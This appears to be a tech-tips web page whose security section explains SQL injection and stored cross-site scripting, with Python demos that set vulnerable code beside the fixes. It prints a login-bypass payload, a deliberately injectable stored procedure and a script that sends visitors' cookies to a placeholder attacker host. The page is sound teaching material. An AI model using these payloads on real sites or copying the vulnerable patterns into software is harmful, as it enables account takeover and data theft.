Technical Problems & Solutions
In daily life we keep running into small tasks we would like to speed up, or tricks that make the work easier. For instance, in an Excel sheet you may want a drop-down list instead of typing the same values (passed/failed, present/absent and so on) over and over. There are countless simple tricks like this that make work less tedious.
If the problem you are facing is not covered here, please let us know (Click here) and we will do our best to provide a solution.
MS Word: How to insert any file (doc, pdf etc.) into a Microsoft Word document?
Solution: Follow these simple steps to insert a file (doc, pdf etc.) into your MS Word document:
1. Open the MS Word document.
2. Click the 'Insert' tab, displayed next to Home.
3. In the 'Text' group, click 'Object'.
4. In the 'Object' dialog box, on the 'Create New' tab, choose the object type (e.g. Adobe Acrobat Document) and click OK. To embed a file that already exists on disk, use the 'Create from File' tab instead, browse to the file and click OK.
Note: an embedded object is opened by its own application when double-clicked, so treat embedded objects in documents you did not create yourself with the same caution as attachments.
-----------------------------------------June 01, 2013-----------------------------------------------------
MS Excel: How to add a drop-down list in an Excel spreadsheet?
Solution: If you are struggling to add a drop-down list to an Excel sheet (e.g. a cell that offers the values a, b, c and d), follow these steps:
1. Open MS Excel.
2. Click the Data tab (at the top of Excel, next to the Formulas tab).
3. Select the cell that should hold the drop-down list, then click Data Validation.
4. On the Settings tab (the default tab of the Data Validation window), select List from the Allow drop-down field.
Note: make sure you have selected the cell where you want the drop-down list before opening Data Validation.
5. Click the range-selector image at the right of the Source field; a small pop-up opens. Click the image again, then select the cell range containing the values you want in the drop-down list.
Note: the selected range is filled into the Source field of the Data Validation window (step 4). Click OK to save.
6. The drop-down now shows the items from that range. To get the same drop-down in another cell, copy the cell you just configured and paste it into the new cell.
Note: data validation only guides what is typed into the cell; values can still be pasted in or edited with other tools, so do not rely on it as the only check if the sheet feeds another system.
-----------------------------------------April 30, 2013-----------------------------------------------------
What is Threat Modeling?
Solution: Threat modeling is an engineering technique you can use to help you identify threats, attacks, vulnerabilities, and countermeasures that could affect your application. You can use threat modeling to shape your application's design, meet your company's security objectives, and reduce risk.
What is SQL injection?
Solution: SQL injection is a code injection technique that exploits a security vulnerability in the database layer of an application.
Basically it is the insertion or "injection" of SQL via the input data sent from the client to the application. In other words, it is "an attack technique used to exploit web sites by altering back-end SQL statements through manipulating application input."
How does it happen?
Consider a web page with two fields for the user to enter:
• User name
• Password
The code behind the page generates a SQL query to check the password against the list of user names:
SELECT UserList.Username FROM UserList WHERE
UserList.Username = 'Username' AND
UserList.Password = 'Password'
If this query returns any rows, access is granted.
However, if a malicious user enters a valid username and injects SQL (password' OR '1'='1) into the Password field, the resulting query looks like this:
SELECT UserList.Username FROM UserList WHERE
UserList.Username = 'Username' AND UserList.Password = 'password' OR '1'='1'
Here "password" can be blank or any innocuous string. Because AND binds more tightly than OR, the condition is evaluated as (Username = 'Username' AND Password = 'password') OR '1'='1'; '1'='1' is always true, so the query returns rows (typically every user in the table) and access is granted.
Causes of SQL Injection Vulnerability
SQL injection happens when a developer places user input directly into a SQL statement without properly filtering or escaping dangerous characters, or, better, without keeping the input separate from the query altogether. Such vulnerabilities can occur whenever one programming or scripting language is embedded inside another.
How does the attacker work?
Attackers commonly insert a single quote (') into a URL's query string or a form's input field to test for SQL injection. If the application returns a database error message like the one below, there is a good chance it is vulnerable. The absence of an error does not prove the application is safe: errors may be suppressed, and the injection may still be exploitable without visible output.
Error message: Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'or' /wasc.asp, line 69.
Effects of SQL Injection
A successful SQL injection allows attackers to:
• tamper with existing data
• modify database data (Insert/Update/Delete)
• execute administrative operations on the database (such as shutting down the DBMS)
• destroy the data or otherwise make it unavailable
Where and why does it occur?
Where: SQL injection is very common in PHP and ASP applications.
Why:
• Because of the prevalence of older functional interfaces that take a finished SQL string (such as the original PHP mysql_* functions).
• Because of the nature of the programmatic database interfaces available on those platforms.
How to avoid it?
There are three complementary methods that successfully mitigate SQL injection attacks:
• Parameterized queries using bound, typed parameters.
• Careful use of parameterized stored procedures.
• Least-privilege database connections.
Parameterized queries are the easiest to adopt and work in much the same way across most web technologies in use today, including Java EE, .NET and PHP.
Parameterized Queries with Bound Parameters
They keep the query and the data separate through the use of placeholders known as "bound" parameters. In Java, for example, a prepared statement looks like this:
"select * from table where column_a = ? and column_b = ?"
The developer must then set values for the two ? placeholders through the driver's setter methods, so that the values are sent to the database as data and never spliced into the SQL text.
Writing a query with placeholders but then concatenating the user input into the string anyway (or formatting it in before calling the driver) provides no protection against SQL injection.
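The login check from "How does it happen?" and the bound-parameter fix above, run end to end as an added example (this is not code from the original page). A throwaway in-memory SQLite database stands in for the UserList table; one function builds the query by concatenation exactly as the vulnerable page does, the other binds the same two values as parameters. It also runs the single-quote probe from "How does the attacker work?" against both versions. The table contents, the function names and the use of SQLite are assumptions made for the example.

```python
import sqlite3

# Constructed sample data standing in for the page's UserList table (not from the original page).
SAMPLE_USERS = [("alice", "s3cret"), ("bob", "hunter2")]

# The payload from the page's example, as typed into the Password field.
PAYLOAD = "' OR '1'='1"


def make_db() -> sqlite3.Connection:
    """In-memory SQLite database with the UserList table used in the text."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE UserList (Username TEXT, Password TEXT)")
    conn.executemany("INSERT INTO UserList VALUES (?, ?)", SAMPLE_USERS)
    return conn


def build_vulnerable_sql(username: str, password: str) -> str:
    """The page's query assembled by string concatenation: user input becomes SQL text."""
    return (
        "SELECT UserList.Username FROM UserList WHERE "
        f"UserList.Username = '{username}' AND "
        f"UserList.Password = '{password}'"
    )


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Usernames matched by the concatenated query; any row means 'access granted'."""
    return sorted(row[0] for row in conn.execute(build_vulnerable_sql(username, password)))


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Same query with bound parameters: the driver sends the values separately from
    the SQL, so a quote or an OR clause in the input is only ever compared as data."""
    sql = (
        "SELECT UserList.Username FROM UserList WHERE "
        "UserList.Username = ? AND UserList.Password = ?"
    )
    return sorted(row[0] for row in conn.execute(sql, (username, password)))


def probe_with_quote(conn: sqlite3.Connection, login) -> bool:
    """The attacker's single-quote test: a database syntax error on a lone ' is the
    tell-tale the page describes. True means the login function looks injectable."""
    try:
        login(conn, "'", "anything")
    except sqlite3.OperationalError:
        return True
    return False


def demo() -> dict:
    """Runs probe and bypass against both implementations and returns the results."""
    conn = make_db()
    return {
        # the concatenated query text, with the injected OR clause visible at the end
        "injected_sql": build_vulnerable_sql("alice", PAYLOAD),
        # concatenation: the lone quote breaks the SQL, and the payload returns every user
        "probe_vulnerable": probe_with_quote(conn, login_vulnerable),
        "bypass_vulnerable": login_vulnerable(conn, "alice", PAYLOAD),
        # binding: no syntax error, the payload matches nobody, the real password still works
        "probe_parameterized": probe_with_quote(conn, login_parameterized),
        "bypass_parameterized": login_parameterized(conn, "alice", PAYLOAD),
        "legit_parameterized": login_parameterized(conn, "alice", "s3cret"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Note that the vulnerable version looks harmless in source: an f-string is just concatenation by another name, and any language's string formatting has the same effect. The probe result is a signal, not a proof; a parameterized query that is later wrapped in dynamic SQL on the server side can still be injectable, which is the point of the stored-procedure section below.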
Parameterized Stored Procedures
Stored procedures with typed parameters are an effective mechanism for avoiding most forms of SQL injection. Combined with parameterized bound queries, it is very unlikely that SQL injection will occur within your application. However, dynamic SQL inside a stored procedure reintroduces the problem: the procedure below concatenates @userName into a query string and then executes that string, so the caller's input is interpreted as SQL again:
create proc DynamicSQL(@userName nvarchar(25)) as
declare @sql nvarchar(255)
set @sql = 'select * from users where UserName = ''' + @userName + ''''
exec sp_executesql @sql
A value such as x' OR '1'='1 passed as @userName gives the same bypass as in the web example above. The fix is to keep the query text fixed and pass @userName to sp_executesql as a parameter instead of concatenating it.
Least-Privilege Connections
Always connect with an account that has the minimum privileges the application needs; never use "sa", "dba", "admin" or the equivalent. This does not prevent injection, but it limits what a successful injection can do: an account with only SELECT/INSERT/UPDATE rights on the application's own tables cannot drop them or shut down the server.
What is Code injection?
Code injection is the exploitation of a computer bug caused by processing invalid data.
An attacker uses code injection to introduce (or "inject") code into a computer program and change the course of execution.
Example: a web server has a "Guest book" script that accepts small messages from users and typically receives messages such as "Very Nice site!".
However, a malicious person who knows of a code injection vulnerability in the guest book may enter a message such as:
Nice Site, I think I'll take it.<script>document.location='http://some_attacker/cookie.cgi?'+document.cookie</script>
When another user views the page, the injected script executes in that user's browser and sends their cookie to the attacker, who can then impersonate the user. The same bug can also be triggered accidentally by an unsuspecting user whose message happens to contain markup, which makes the website render broken HTML.
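The guest book above, rendered both ways, as an added example that is not part of the original page: one renderer splices stored messages straight into the HTML, the other encodes the HTML metacharacters first so the page's cookie-stealing payload is displayed as text rather than run. The guest-book entries and the function names are constructed for the example; the attacker host is the placeholder the page itself uses.

```python
import html

# Constructed guest-book entries (not from the original page): a benign message and the
# page's cookie-stealing payload, stored exactly as an attacker would submit them.
ENTRIES = [
    "Very Nice site!",
    "Nice Site, I think I'll take it."
    "<script>document.location='http://some_attacker/cookie.cgi?'+document.cookie</script>",
]


def render_unsafe(entries) -> str:
    """Splices each stored message straight into the page, so markup inside a message is
    interpreted by every visitor's browser: the stored code-injection bug in the text."""
    return "\n".join(f"<li>{message}</li>" for message in entries)


def render_safe(entries) -> str:
    """Encodes the HTML metacharacters (< > & ' ") of each message before it is placed in
    element content, so the browser displays the payload as text instead of running it."""
    return "\n".join(f"<li>{html.escape(message, quote=True)}</li>" for message in entries)


def contains_live_script(page: str) -> bool:
    """Crude check used only to show the difference between the two renderers:
    is there a real <script> tag left in the output?"""
    return "<script" in page.lower()


def demo() -> dict:
    """Renders the entries both ways and reports whether the script survived."""
    return {
        "unsafe_has_script": contains_live_script(render_unsafe(ENTRIES)),
        "safe_has_script": contains_live_script(render_safe(ENTRIES)),
        "safe_second_entry": render_safe(ENTRIES).splitlines()[1],
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

html.escape is the right encoder only for HTML element content; a message placed inside an attribute value, a JavaScript string or a URL needs the encoder for that context. Marking the session cookie HttpOnly is an independent, complementary measure: it keeps document.cookie from reading it even if a script does get injected.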
The term vulnerability refers to a weakness in a system that allows an attacker to violate the integrity of that system. Vulnerabilities may result from:
• weak passwords
• software bugs
• computer viruses
• script code injection and SQL injection
Causes of vulnerabilities
Password management flaws:
• users choose weak passwords that can be guessed or cracked
• users store passwords on the computer where a program can read them
• users re-use passwords across many programs and websites
Fundamental application design flaws: the application designer chooses to enforce sub-optimal policies on user/program management, for example:
• Default permit: every program and every user is granted full access to the entire computer. This operating-system flaw allows viruses to execute commands on behalf of the administrator.
• Exploitable software bugs: sometimes a programmer leaves a bug in a program that an attacker can misuse through unchecked user input.
Unchecked user input: the program assumes that all user input is safe. Programs that do not check user input can allow unintended direct execution of commands or SQL statements (command injection, SQL injection) or overrun fixed-size memory (buffer overflows).
Common types of vulnerabilities
• Memory safety violations, such as:
  • Buffer overflows
• HTTP header injection
• HTTP response splitting